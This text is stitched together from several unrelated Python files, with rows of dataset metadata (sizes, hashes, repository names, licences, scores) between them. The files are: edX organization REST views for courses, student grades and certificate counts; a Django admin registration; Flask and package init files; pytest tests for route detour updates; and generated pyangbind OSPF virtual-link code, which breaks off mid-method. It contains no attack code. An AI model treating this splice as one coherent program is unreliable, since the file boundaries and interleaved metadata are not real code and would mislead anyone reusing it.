* enrollment_start: The course enrollment start date.
* enrollment_end: The course enrollment end date. If course enrollment end date is not
specified, the value is null.
**ERROR RESPONSES**
* Response Code <403> FORBIDDEN
"""
queryset = get_all_organization()
serializer_class = OrganizationSerializer
permission_classes = (IsAdminUser,)
authentication_classes = (SessionAuthentication, BasicAuthentication, OAuth2Authentication)
class OrganizationDetail(generics.RetrieveAPIView):
"""
**Use Case**
Get all the courses for a specific organization.
**Example Requests**
GET /api/organizations/v1/summary/{organization_name}
**Response Values**
On success with Response Code <200>
* organization: The name of the organization.
* courses:
* id: The unique identifier for the course.
* display_name: The display name of the course.
* start: The course start date.
* end: The course end date. If course end date is not specified, the
value is null.
* enrollment_start: The course enrollment start date.
* enrollment_end: The course enrollment end date. If course enrollment end date is not
specified, the value is null.
**ERROR RESPONSES**
* Response Code <404> ORGANIZATION NOT FOUND
* Response Code <403> FORBIDDEN
"""
serializer_class = OrganizationSerializer
permission_classes = (IsAdminUser,)
authentication_classes = (SessionAuthentication, BasicAuthentication, OAuth2Authentication)
def get_object(self):
try:
organization = self.kwargs['organization']
list = get_all_courses(organization)
list['organization']
return list
except:
raise Http404
class OrganizationCountList(generics.ListAPIView):
"""
**Use Case**
*Get a paginated list of organizations with all its courses and count of students in the edX Platform.
Each page in the list can contain up to 10 courses.
**Example Requests**
GET /api/organizations/v1/count/
**Response Values**
On success with Response Code <200>
* count: The number of courses in the edX platform.
* next: The URI to the next page of courses.
* previous: The URI to the previous page of courses.
* num_pages: The number of pages listing courses.
* results: A list of courses returned. Each collection in the list
contains these fields.
* organization: The name of the organization.
* courses:
* id: The unique identifier for the course.
* display_name: The display name of the course.
* start: The course start date.
* end: The course end date. If course end date is not specified, the
value is null.
* enrollment_start: The course enrollment start date.
* enrollment_end: The course enrollment end date. If course enrollment end date is not
specified, the value is null.
* students: Count of students in the course
**ERROR RESPONSES**
* Response Code <403> FORBIDDEN
"""
queryset = get_all_organization_count_students()
serializer_class = OrganizationStudentSerializer
permission_classes = (IsAdminUser,)
authentication_classes = (SessionAuthentication, BasicAuthentication, OAuth2Authentication)
class OrganizationCountDetail(generics.RetrieveAPIView):
"""
**Use Case**
Get all the courses and count of students for a specific organization.
**Example Requests**
GET /api/organizations/v1/count/{organization_name}
**Response Values**
On success with Response Code <200>
* organization: The name of the organization.
* courses:
* id: The unique identifier for the course.
* display_name: The display name of the course.
* start: The course start date.
* end: The course end date. If course end date is not specified, the
value is null.
* enrollment_start: The course enrollment start date.
* enrollment_end: The course enrollment end date. If course enrollment end date is not
specified, the value is null.
* students: Count of students in the course
**ERROR RESPONSES**
* Response Code <404> ORGANIZATION NOT FOUND
* Response Code <403> FORBIDDEN
"""
serializer_class = OrganizationStudentSerializer
permission_classes = (IsAdminUser,)
authentication_classes = (SessionAuthentication, BasicAuthentication, OAuth2Authentication)
def get_object(self):
try:
organization = self.kwargs['organization']
list = get_all_courses_count_students(organization)
list['organization']
return list
except:
raise Http404
class OrganizationGradeList(generics.ListAPIView):
"""
**Use Case**
*Get a paginated list of organization with all its courses and students in the edX Platform.
Each page in the list can contain up to 10 courses.
**Example Requests**
GET /api/organizations/v1/grade/
**Response Values**
On success with Response Code <200>
* count: The number of courses in the edX platform.
* next: The URI to the next page of courses.
* previous: The URI to the previous page of courses.
* num_pages: The number of pages listing courses.
* results: A list of courses returned. Each collection in the list
contains these fields.
* organization: The name of the organization.
* courses:
* course_name: Name of the course
* course_organization: The organization specified for the course.
* course_run: The run of the course
* students:
* id: The unique identifier for the student.
* username: Username of the student
* email: Email of the student
* grade: Overall grade of the student in the course
* total_score: Total score of the student in the course
* is_active: Shows whether the student is active or not
1: if student is active
0: if student is not active
* last_login: The date and time at which the student was last active
**ERROR RESPONSES**
* Response Code <403> FORBIDDEN
"""
queryset = get_all_organization_courses_grades()
serializer_class = OrganizationGradeSerializer
permission_classes = (IsAdminUser,)
authentication_classes = (SessionAuthentication, BasicAuthentication, OAuth2Authentication)
class OrganizationGradeDetail(generics.RetrieveAPIView):
"""
**Use Case**
Get all the courses and students for a specific organization.
**Example Requests**
GET /api/organizations/v1/grade/{organization_name}
**Response Values**
On success with Response Code <200>
* organization: The name of the organization.
* courses:
* course_name: Name of the course
* course_organization: The organization specified for the course.
* course_run: The run of the course
* students:
* id: The unique identifier for the student.
* username: Username of the student
* email: Email of the student
* grade: Overall grade of the student in the course
* total_score: Total score of the student in the course
* is_active: Shows whether the student is active or not
1: if student is active
0: if student is not active
* last_login: The date and time at which the student was last active
**ERROR RESPONSES**
* Response Code <404> ORGANIZATION NOT FOUND
* Response Code <403> FORBIDDEN
"""
serializer_class = OrganizationGradeSerializer
permission_classes = (IsAdminUser,)
authentication_classes = (SessionAuthentication, BasicAuthentication, OAuth2Authentication)
def get_object(self):
try:
organization = self.kwargs['organization']
list = get_all_courses_grades(organization)
list['organization']
return list
except:
raise Http404
class OrganizationCertificateList(generics.ListAPIView):
"""
**Use Case**
*Get a paginated list of organization with all its courses and count of certificates in the edX Platform.
Each page in the list can contain up to 10 courses.
**Example Requests**
GET /api/organizations/v1/certificate/
**Response Values**
On success with Response Code <200>
* count: The number of courses in the edX platform.
* next: The URI to the next page of courses.
* previous: The URI to the previous page of courses.
* num_pages: The number of pages listing courses.
* results: A list of courses returned. Each collection in the list
contains these fields.
* organization: The name of the organization.
* courses:
* course_id: The unique identifier for the course.
* course_name: Name of the course
* course_organization: The organization specified for the course.
* course_run: The run of the course.
* certificate_count: Count of certificates of the course
**ERROR RESPONSES**
* Response Code <403> FORBIDDEN
"""
queryset = get_all_organization_certificate_count()
serializer_class = OrganizationCertificateSerializer
permission_classes = (IsAdminUser,)
authentication_classes = (SessionAuthentication, BasicAuthentication, OAuth2Authentication)
class OrganizationCertificateDetail(generics.RetrieveAPIView):
"""
**Use Case**
Get all the courses and count of certificates for a specific organization.
**Example Requests**
GET /api/organizations/v1/certificate/{organization_name}
**Response Values**
On success with Response Code <200>
* organization: The name of the organization.
* courses:
* course_id: The unique identifier for the course.
* course_name: Name of the course
* course_organization: The organization specified for the course.
* course_run: The run of the course.
* certificate_count: Count of certificates of the course
**ERROR RESPONSES**
* Response Code <404> ORGANIZATION NOT FOUND
* Response Code <403> FORBIDDEN
"""
serializer_class = OrganizationCertificateSerializer
permission_classes = (IsAdminUser,)
authentication_classes = (SessionAuthentication, BasicAuthentication, OAuth2Authentication)
def get_object(self):
try:
organization = self.kwargs['organization']
list = get_organization_certificate_count(organization )
list['organization']
return list
except:
raise Http404
| 31.69869
| 141
| 0.577766
| 1,416
| 14,518
| 5.852401
| 0.103814
| 0.049958
| 0.017377
| 0.015446
| 0.916737
| 0.913841
| 0.913841
| 0.905032
| 0.892724
| 0.862314
| 0
| 0.011459
| 0.368852
| 14,518
| 458
| 142
| 31.69869
| 0.892939
| 0.625362
| 0
| 0.693333
| 0
| 0
| 0.026265
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053333
| false
| 0
| 0.093333
| 0
| 0.68
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b7bc72bbcc88f2f5e9f214e159a50a96cba47e04
| 198
|
py
|
Python
|
src/jober/admin.py
|
kurrbanov/jober
|
ffa792b8242de3dff6af5716b929239732c41b62
|
[
"MIT"
] | null | null | null |
src/jober/admin.py
|
kurrbanov/jober
|
ffa792b8242de3dff6af5716b929239732c41b62
|
[
"MIT"
] | null | null | null |
src/jober/admin.py
|
kurrbanov/jober
|
ffa792b8242de3dff6af5716b929239732c41b62
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import *
# Register your models here.
admin.site.register(Applicant)
admin.site.register(Company)
admin.site.register(Like)
admin.site.register(Match)
| 22
| 32
| 0.80303
| 28
| 198
| 5.678571
| 0.5
| 0.226415
| 0.427673
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 198
| 8
| 33
| 24.75
| 0.883333
| 0.131313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
b7ed42951af869f5ce9c11974d687d447c7a74e2
| 29
|
py
|
Python
|
videoanalyst/model/backbone/__init__.py
|
lizhenbang56/Manipulating-Template-Pixels-for-Model-Adaptation-of-Siamese-Visual-Tracking
|
76b88d8e68ac3d575a2ce81fc07ee2fce5f050d6
|
[
"MIT"
] | 2
|
2020-07-30T08:26:08.000Z
|
2020-11-24T07:40:46.000Z
|
videoanalyst/model/backbone/__init__.py
|
shartoo/video_analyst
|
db7c1b323f26ec19533a4b19804cf2c8a52643e5
|
[
"MIT"
] | null | null | null |
videoanalyst/model/backbone/__init__.py
|
shartoo/video_analyst
|
db7c1b323f26ec19533a4b19804cf2c8a52643e5
|
[
"MIT"
] | null | null | null |
from .backbone_impl import *
| 29
| 29
| 0.793103
| 4
| 29
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 29
| 1
| 29
| 29
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4d1e1ff262c515006e9c040b9b75dac600b06f5f
| 145
|
py
|
Python
|
app/users/__init__.py
|
lpdswing/flask-pyjwt-demo
|
009e052690e19b79a8fa2b0cc3094cc6e193397d
|
[
"Apache-2.0"
] | 3
|
2019-03-20T08:39:50.000Z
|
2019-04-12T13:00:45.000Z
|
app/users/__init__.py
|
lpdswing/flask-pyjwt-demo
|
009e052690e19b79a8fa2b0cc3094cc6e193397d
|
[
"Apache-2.0"
] | null | null | null |
app/users/__init__.py
|
lpdswing/flask-pyjwt-demo
|
009e052690e19b79a8fa2b0cc3094cc6e193397d
|
[
"Apache-2.0"
] | null | null | null |
#-*- coding:utf-8 -*-
# datetime: 2019/3/20 9:21
from flask import Blueprint
auth = Blueprint('auth', __name__)
from . import api, urls, model
| 18.125
| 34
| 0.682759
| 22
| 145
| 4.318182
| 0.818182
| 0.273684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090164
| 0.158621
| 145
| 8
| 35
| 18.125
| 0.688525
| 0.310345
| 0
| 0
| 0
| 0
| 0.040404
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
4d963e8d5f477db24af81424b51901e5a9ee4831
| 2,611
|
py
|
Python
|
jobs/tests/tasks/test_update_detours.py
|
stanwood/traidoo-api
|
83e8599f2eb54352988bac27e2d4acd30734816d
|
[
"MIT"
] | 3
|
2020-05-05T12:12:09.000Z
|
2020-05-08T08:48:16.000Z
|
jobs/tests/tasks/test_update_detours.py
|
stanwood/traidoo-api
|
83e8599f2eb54352988bac27e2d4acd30734816d
|
[
"MIT"
] | 160
|
2020-05-19T13:03:43.000Z
|
2022-03-12T00:35:28.000Z
|
jobs/tests/tasks/test_update_detours.py
|
stanwood/traidoo-api
|
83e8599f2eb54352988bac27e2d4acd30734816d
|
[
"MIT"
] | null | null | null |
from unittest import mock
import pytest
from model_bakery import baker
pytestmark = pytest.mark.django_db
@mock.patch("jobs.tasks.update_detours.calculate_route_length")
def test_update_detours_for_route(
calculate_route_length_mock, client_anonymous, settings
):
settings.FEATURES["routes"] = True
default_route_length = 1200
calculate_route_length_mock.return_value = default_route_length
seller_1 = baker.make_recipe("users.user")
product_1 = baker.make(
"products.Product", seller=seller_1, third_party_delivery=True
)
order_1 = baker.make("orders.Order", processed=False)
delivery_address_1 = baker.make_recipe("delivery_addresses.delivery_address")
order_item_1 = baker.make(
"orders.OrderItem",
order=order_1,
product=product_1,
delivery_address=delivery_address_1,
)
user = baker.make("users.User")
job_2 = baker.make("jobs.Job", order_item=order_item_1, user=user)
route_2 = baker.make("routes.Route")
detour_2 = baker.make("jobs.Detour", route=route_2, length=123, job=job_2)
response = client_anonymous.post(
f"/detours/update/{route_2.id}", **{"HTTP_X_APPENGINE_QUEUENAME": "queue"}
)
assert response.status_code == 200
detour_2.refresh_from_db()
assert detour_2.length == default_route_length
@mock.patch("jobs.tasks.update_detours.calculate_route_length")
def test_do_not_update_detours_for_processed_orders(
calculate_route_length_mock, client_anonymous, settings
):
settings.FEATURES["routes"] = True
default_route_length = 123
calculate_route_length_mock.return_value = 1000
seller_1 = baker.make_recipe("users.user")
product_1 = baker.make(
"products.Product", seller=seller_1, third_party_delivery=True
)
order_1 = baker.make("orders.Order", processed=True)
delivery_address_1 = baker.make_recipe("delivery_addresses.delivery_address")
order_item_1 = baker.make(
"orders.OrderItem",
order=order_1,
product=product_1,
delivery_address=delivery_address_1,
)
user = baker.make("users.User")
job_2 = baker.make("jobs.Job", order_item=order_item_1, user=user)
route_2 = baker.make("routes.Route")
detour_2 = baker.make(
"jobs.Detour", route=route_2, length=default_route_length, job=job_2
)
response = client_anonymous.post(
f"/detours/update/{route_2.id}", **{"HTTP_X_APPENGINE_QUEUENAME": "queue"}
)
assert response.status_code == 200
detour_2.refresh_from_db()
assert detour_2.length == default_route_length
| 31.457831
| 82
| 0.719648
| 349
| 2,611
| 5.037249
| 0.209169
| 0.09215
| 0.056883
| 0.054608
| 0.894198
| 0.883959
| 0.844141
| 0.844141
| 0.844141
| 0.844141
| 0
| 0.025902
| 0.171965
| 2,611
| 82
| 83
| 31.841463
| 0.787234
| 0
| 0
| 0.65625
| 0
| 0
| 0.186136
| 0.104941
| 0
| 0
| 0
| 0
| 0.0625
| 1
| 0.03125
| false
| 0
| 0.046875
| 0
| 0.078125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4da33b342bc4984c6ee56a48a006eac2c1e2c47a
| 29,677
|
py
|
Python
|
pybind/nos/v7_1_0/rbridge_id/router/ospf/area/virtual_link/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/nos/v7_1_0/rbridge_id/router/ospf/area/virtual_link/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/nos/v7_1_0/rbridge_id/router/ospf/area/virtual_link/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import authentication_key
import md5_authentication
class virtual_link(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-rbridge - based on the path /rbridge-id/router/ospf/area/virtual-link. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__virt_link_neighbor','__authentication_key','__dead_interval','__hello_interval','__retransmit_interval','__transmit_delay','__md5_authentication',)
_yang_name = 'virtual-link'
_rest_name = 'virtual-link'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__retransmit_interval = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..3600']}), is_leaf=True, yang_name="retransmit-interval", rest_name="retransmit-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Time between retransmitting lost link state\n advertisements'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
self.__md5_authentication = YANGDynClass(base=md5_authentication.md5_authentication, is_container='container', presence=False, yang_name="md5-authentication", rest_name="md5-authentication", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'MD5 authentication parameters', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='container', is_config=True)
self.__dead_interval = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'3..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(40), is_leaf=True, yang_name="dead-interval", rest_name="dead-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interval after which a neighbor is declared dead'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
self.__hello_interval = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(10), is_leaf=True, yang_name="hello-interval", rest_name="hello-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Time between HELLO packets'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
self.__authentication_key = YANGDynClass(base=authentication_key.authentication_key, is_container='container', presence=False, yang_name="authentication-key", rest_name="authentication-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Authentication password (key)', u'cli-full-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='container', is_config=True)
self.__virt_link_neighbor = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="virt-link-neighbor", rest_name="virt-link-neighbor", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='inet:ipv4-address', is_config=True)
self.__transmit_delay = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..3600']}), is_leaf=True, yang_name="transmit-delay", rest_name="transmit-delay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Link state transmit delay'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'rbridge-id', u'router', u'ospf', u'area', u'virtual-link']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'rbridge-id', u'router', u'ospf', u'area', u'virtual-link']
def _get_virt_link_neighbor(self):
"""
Getter method for virt_link_neighbor, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/virt_link_neighbor (inet:ipv4-address)
"""
return self.__virt_link_neighbor
def _set_virt_link_neighbor(self, v, load=False):
"""
Setter method for virt_link_neighbor, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/virt_link_neighbor (inet:ipv4-address)
If this variable is read-only (config: false) in the
source YANG file, then _set_virt_link_neighbor is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_virt_link_neighbor() directly.
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="virt-link-neighbor", rest_name="virt-link-neighbor", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='inet:ipv4-address', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """virt_link_neighbor must be of a type compatible with inet:ipv4-address""",
'defined-type': "inet:ipv4-address",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="virt-link-neighbor", rest_name="virt-link-neighbor", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='inet:ipv4-address', is_config=True)""",
})
self.__virt_link_neighbor = t
if hasattr(self, '_set'):
self._set()
def _unset_virt_link_neighbor(self):
self.__virt_link_neighbor = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="virt-link-neighbor", rest_name="virt-link-neighbor", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='inet:ipv4-address', is_config=True)
def _get_authentication_key(self):
"""
Getter method for authentication_key, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/authentication_key (container)
"""
return self.__authentication_key
def _set_authentication_key(self, v, load=False):
"""
Setter method for authentication_key, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/authentication_key (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_authentication_key is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_authentication_key() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=authentication_key.authentication_key, is_container='container', presence=False, yang_name="authentication-key", rest_name="authentication-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Authentication password (key)', u'cli-full-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """authentication_key must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=authentication_key.authentication_key, is_container='container', presence=False, yang_name="authentication-key", rest_name="authentication-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Authentication password (key)', u'cli-full-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='container', is_config=True)""",
})
self.__authentication_key = t
if hasattr(self, '_set'):
self._set()
def _unset_authentication_key(self):
self.__authentication_key = YANGDynClass(base=authentication_key.authentication_key, is_container='container', presence=False, yang_name="authentication-key", rest_name="authentication-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Authentication password (key)', u'cli-full-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='container', is_config=True)
def _get_dead_interval(self):
"""
Getter method for dead_interval, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/dead_interval (common-def:time-interval-sec)
"""
return self.__dead_interval
def _set_dead_interval(self, v, load=False):
"""
Setter method for dead_interval, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/dead_interval (common-def:time-interval-sec)
If this variable is read-only (config: false) in the
source YANG file, then _set_dead_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_dead_interval() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'3..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(40), is_leaf=True, yang_name="dead-interval", rest_name="dead-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interval after which a neighbor is declared dead'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """dead_interval must be of a type compatible with common-def:time-interval-sec""",
'defined-type': "common-def:time-interval-sec",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'3..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(40), is_leaf=True, yang_name="dead-interval", rest_name="dead-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interval after which a neighbor is declared dead'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)""",
})
self.__dead_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_dead_interval(self):
self.__dead_interval = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'3..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(40), is_leaf=True, yang_name="dead-interval", rest_name="dead-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interval after which a neighbor is declared dead'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
def _get_hello_interval(self):
"""
